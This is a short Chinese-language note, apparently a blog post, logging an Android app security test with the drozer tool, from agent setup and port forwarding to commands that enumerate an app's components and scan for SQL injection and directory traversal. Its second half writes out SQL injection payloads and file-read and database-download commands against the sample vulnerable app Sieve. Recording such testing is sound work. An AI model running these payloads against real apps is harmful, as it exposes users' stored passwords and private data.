《二》drozer 漏洞扫描

对于现有的项目做了部分角度的安全测试。做个记录。

工具:drozer,源码地址:https://github.com/mwrlabs/drozer/
步骤:
准备:
1.运行 drozer-agent.apk
2.选择 embedded--enable
3.设置端口转发:adb forward tcp:31415 tcp:31415

运行:
1.连接 drozer:
drozer.bat console connect

2.列出详细 APP 信息:
run app.package.info -a com.xxx.xxxx

3.查看 APP 的配置信息
run app.package.manifest com.xxx.xxxx

3.分析是否存在攻击攻击点
run app.package.attacksurface com.xxx.xxxx

4.查看暴露的 provider 权限
run app.provider.info -a com.xxx.xxxx

5.获取 Activity 信息
命令 run app.activity.info -a
示例 run app.activity.info -a com.xxx.xxxx

6.检测 SQL 注入
命令 run scanner.provider.injection -a
示例 run scanner.provider.injection -a com.xxx.xxxx

7.检测目录遍历
命令 run scanner.provider.traversal -a
示例 run scanner.provider.traversal -a com.xxx.xxxx

8.获取所有可访问的 Uri
命令 run scanner.provider.finduris -a
示例 run scanner.provider.finduris -a com.xxx.xxxx

9.SQL 注入
命令 run app.provider.query [--projection] [--selection]
示例 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

列出所有表 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
获取单表(如 Key)的数据 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

10.读取文件系统下的文件
示例 run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

11.下载数据库文件到本地
示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db


↙↙↙阅读原文可查看相关链接,并与作者交流